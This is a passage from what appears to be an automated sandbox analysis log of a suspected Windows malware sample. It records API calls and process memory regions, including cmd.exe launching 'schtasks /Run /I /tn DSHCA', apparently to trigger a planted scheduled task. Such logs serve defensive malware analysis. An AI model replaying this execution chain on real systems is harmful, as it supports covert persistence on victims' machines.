lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0xecf0d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xecf0d0) returned 0x10b89c0 [0296.842] FindClose (in: hFindFile=0x10b89c0 | out: hFindFile=0x10b89c0) returned 1 [0296.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0xecf0d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xecf0d0) returned 0xffffffff [0296.843] GetLastError () returned 0x2 [0296.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0xecf0d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xecf0d0) returned 0x10b89c0 [0296.843] FindClose (in: hFindFile=0x10b89c0 | out: hFindFile=0x10b89c0) returned 1 [0296.843] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0296.843] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0296.843] GetConsoleTitleW (in: lpConsoleTitle=0xecf5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0296.843] InitializeProcThreadAttributeList (in: lpAttributeList=0xecf4f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xecf4d4 | out: lpAttributeList=0xecf4f0, lpSize=0xecf4d4) returned 1 [0296.843] UpdateProcThreadAttribute (in: lpAttributeList=0xecf4f0, dwFlags=0x0, Attribute=0x60001, lpValue=0xecf4dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xecf4f0, lpPreviousValue=0x0) returned 1 [0296.843] GetStartupInfoW (in: lpStartupInfo=0xecf528 | out: lpStartupInfo=0xecf528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0296.843] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0296.844] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0296.844] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0296.845] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Run /I /tn DSHCA", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xecf478*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Run /I /tn DSHCA", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xecf4c4 | out: lpCommandLine="schtasks /Run /I /tn DSHCA", lpProcessInformation=0xecf4c4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc7c, dwThreadId=0xc84)) returned 1 [0296.853] CloseHandle (hObject=0xa4) returned 1 [0296.853] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0296.853] GetEnvironmentStringsW () returned 0x10b9ef0* [0296.853] FreeEnvironmentStringsA (penv="=") returned 1 [0296.853] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0299.526] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xecf45c | out: lpExitCode=0xecf45c*=0x0) returned 1 [0299.526] CloseHandle (hObject=0xa8) returned 1 [0299.526] _vsnwprintf (in: _Buffer=0xecf544, _BufferCount=0x13, _Format="%08X", _ArgList=0xecf464 | out: _Buffer="00000000") returned 8 [0299.526] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0299.526] GetEnvironmentStringsW () returned 0x10b9ef0* [0299.526] FreeEnvironmentStringsA (penv="=") returned 1 [0299.526] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0299.526] GetEnvironmentStringsW () returned 0x10b9ef0* [0299.526] FreeEnvironmentStringsA (penv="=") returned 1 [0299.526] DeleteProcThreadAttributeList (in: lpAttributeList=0xecf4f0 | out: lpAttributeList=0xecf4f0) [0299.526] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.526] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0299.590] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.590] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0299.591] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.591] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0299.591] SetConsoleInputExeNameW () returned 0x1 [0299.591] GetConsoleOutputCP () returned 0x1b5 [0299.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0299.591] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.591] exit (_Code=0) Thread: id = 994 os_tid = 0xc50 Process: id = "139" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1b3d5000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xbe0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9593 start_va = 0x7f24d000 end_va = 0x7f24dfff entry_point = 0x0 region_type = private name = "private_0x000000007f24d000" filename = "" Region: id = 9594 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9595 start_va = 0xa442600000 end_va = 0xa44261ffff entry_point = 0x0 region_type = private name = "private_0x000000a442600000" filename = "" Region: id = 9596 start_va = 0xa442620000 end_va = 0xa442633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442620000" filename = "" Region: id = 9597 start_va = 0xa442640000 end_va = 0xa44267ffff entry_point = 0x0 region_type = private name = "private_0x000000a442640000" filename = "" Region: id = 9598 start_va = 0x7df5ff0f0000 end_va = 0x7ff5ff0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0f0000" filename = "" Region: id = 9599 start_va = 0x7ff7fd400000 end_va = 0x7ff7fd422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd400000" filename = "" Region: id = 9600 start_va = 0x7ff7fd423000 end_va = 0x7ff7fd423fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd423000" filename = "" Region: id = 9601 start_va = 0x7ff7fd42e000 end_va = 0x7ff7fd42ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd42e000" filename = "" Region: id = 9602 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9603 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9604 start_va = 0xa442600000 end_va = 0xa44260ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442600000" filename = "" Region: id = 9605 start_va = 0xa442680000 end_va = 0xa44273dfff entry_point = 0xa442680000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9606 start_va = 0xa442770000 end_va = 0xa44286ffff entry_point = 0x0 region_type = private name = "private_0x000000a442770000" filename = "" Region: id = 9607 start_va = 0x7ff7fd300000 end_va = 0x7ff7fd3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd300000" filename = "" Region: id = 9608 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9609 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9610 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9611 start_va = 0xa442870000 end_va = 0xa4428affff entry_point = 0x0 region_type = private name = "private_0x000000a442870000" filename = "" Region: id = 9612 start_va = 0xa4428b0000 end_va = 0xa442a6ffff entry_point = 0x0 region_type = private name = "private_0x000000a4428b0000" filename = "" Region: id = 9613 start_va = 0x7ff7fd42c000 end_va = 0x7ff7fd42dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd42c000" filename = "" Region: id = 9614 start_va = 0xa442610000 end_va = 0xa442616fff entry_point = 0x0 region_type = private name = "private_0x000000a442610000" filename = "" Region: id = 9615 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9616 start_va = 0xa442740000 end_va = 0xa442740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442740000" filename = "" Region: id = 9617 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9618 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9619 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9620 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9621 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9622 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9623 start_va = 0xa442750000 end_va = 0xa442756fff entry_point = 0x0 region_type = private name = "private_0x000000a442750000" filename = "" Region: id = 9624 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9625 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9626 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9627 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9628 start_va = 0xa4428b0000 end_va = 0xa442a37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a4428b0000" filename = "" Region: id = 9629 start_va = 0xa442a60000 end_va = 0xa442a6ffff entry_point = 0x0 region_type = private name = "private_0x000000a442a60000" filename = "" Region: id = 9630 start_va = 0xa442a70000 end_va = 0xa442bf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442a70000" filename = "" Region: id = 9631 start_va = 0xa442c00000 end_va = 0xa443ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442c00000" filename = "" Region: id = 9632 start_va = 0xa442760000 end_va = 0xa442760fff entry_point = 0x0 region_type = private name = "private_0x000000a442760000" filename = "" Region: id = 9633 start_va = 0xa442a40000 end_va = 0xa442a40fff entry_point = 0x0 region_type = private name = "private_0x000000a442a40000" filename = "" Region: id = 9634 start_va = 0xa444000000 end_va = 0xa44414ffff entry_point = 0x0 region_type = private name = "private_0x000000a444000000" filename = "" Region: id = 9682 start_va = 0xa444000000 end_va = 0xa44403ffff entry_point = 0x0 region_type = private name = "private_0x000000a444000000" filename = "" Region: id = 9683 start_va = 0xa444140000 end_va = 0xa44414ffff entry_point = 0x0 region_type = private name = "private_0x000000a444140000" filename = "" Region: id = 9684 start_va = 0x7ff7fd42a000 end_va = 0x7ff7fd42bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd42a000" filename = "" Region: id = 9685 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 9686 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 9687 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9688 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 9689 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 9690 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 9691 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 9692 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 9693 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 9694 start_va = 0xa444150000 end_va = 0xa44432ffff entry_point = 0x0 region_type = private name = "private_0x000000a444150000" filename = "" Region: id = 9768 start_va = 0xa444330000 end_va = 0xa444666fff entry_point = 0xa444330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9769 start_va = 0xa442640000 end_va = 0xa442660fff entry_point = 0xa442640000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 9770 start_va = 0xa444040000 end_va = 0xa444098fff entry_point = 0xa444040000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9771 start_va = 0xa444670000 end_va = 0xa444886fff entry_point = 0x0 region_type = private name = "private_0x000000a444670000" filename = "" Region: id = 9772 start_va = 0xa444890000 end_va = 0xa444aa3fff entry_point = 0x0 region_type = private name = "private_0x000000a444890000" filename = "" Region: id = 9773 start_va = 0xa444150000 end_va = 0xa44425efff entry_point = 0x0 region_type = private name = "private_0x000000a444150000" filename = "" Region: id = 9774 start_va = 0xa444320000 end_va = 0xa44432ffff entry_point = 0x0 region_type = private name = "private_0x000000a444320000" filename = "" Region: id = 9775 start_va = 0xa444ab0000 end_va = 0xa444cc2fff entry_point = 0x0 region_type = private name = "private_0x000000a444ab0000" filename = "" Region: id = 9776 start_va = 0xa444cd0000 end_va = 0xa444de6fff entry_point = 0x0 region_type = private name = "private_0x000000a444cd0000" filename = "" Region: id = 9807 start_va = 0xa442640000 end_va = 0xa44267ffff entry_point = 0x0 region_type = private name = "private_0x000000a442640000" filename = "" Region: id = 9808 start_va = 0xa442a50000 end_va = 0xa442a50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442a50000" filename = "" Region: id = 9809 start_va = 0x7ff7fd42e000 end_va = 0x7ff7fd42ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd42e000" filename = "" Region: id = 9810 start_va = 0xa444040000 end_va = 0xa4440f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a444040000" filename = "" Region: id = 9811 start_va = 0xa442a50000 end_va = 0xa442a53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a442a50000" filename = "" Region: id = 9812 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 9813 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 9814 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 9823 start_va = 0xa444100000 end_va = 0xa444106fff entry_point = 0x0 region_type = private name = "private_0x000000a444100000" filename = "" Region: id = 9824 start_va = 0xa444110000 end_va = 0xa444114fff entry_point = 0xa444110000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 9825 start_va = 0xa444120000 end_va = 0xa444120fff entry_point = 0xa444120000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 9826 start_va = 0xa444130000 end_va = 0xa444131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a444130000" filename = "" Region: id = 9827 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 9828 start_va = 0xa444260000 end_va = 0xa444260fff entry_point = 0xa444260000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 9829 start_va = 0xa444270000 end_va = 0xa444271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a444270000" filename = "" Region: id = 9830 start_va = 0xa444260000 end_va = 0xa444260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a444260000" filename = "" Thread: id = 980 os_tid = 0xc08 Thread: id = 982 os_tid = 0xc14 Thread: id = 983 os_tid = 0xc1c Thread: id = 989 os_tid = 0xc38 Process: id = "140" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6a379000" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "138" os_parent_pid = "0xa70" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9635 start_va = 0x7fcd8000 end_va = 0x7fcd8fff entry_point = 0x0 region_type = private name = "private_0x000000007fcd8000" filename = "" Region: id = 9636 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9637 start_va = 0x173d530000 end_va = 0x173d54ffff entry_point = 0x0 region_type = private name = "private_0x000000173d530000" filename = "" Region: id = 9638 start_va = 0x173d550000 end_va = 0x173d563fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d550000" filename = "" Region: id = 9639 start_va = 0x173d570000 end_va = 0x173d5affff entry_point = 0x0 region_type = private name = "private_0x000000173d570000" filename = "" Region: id = 9640 start_va = 0x7df5ff350000 end_va = 0x7ff5ff34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff350000" filename = "" Region: id = 9641 start_va = 0x7ff7fd340000 end_va = 0x7ff7fd362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd340000" filename = "" Region: id = 9642 start_va = 0x7ff7fd36d000 end_va = 0x7ff7fd36efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd36d000" filename = "" Region: id = 9643 start_va = 0x7ff7fd36f000 end_va = 0x7ff7fd36ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd36f000" filename = "" Region: id = 9644 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9645 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9646 start_va = 0x173d530000 end_va = 0x173d53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000173d530000" filename = "" Region: id = 9647 start_va = 0x173d5b0000 end_va = 0x173d6affff entry_point = 0x0 region_type = private name = "private_0x000000173d5b0000" filename = "" Region: id = 9648 start_va = 0x173d6b0000 end_va = 0x173d76dfff 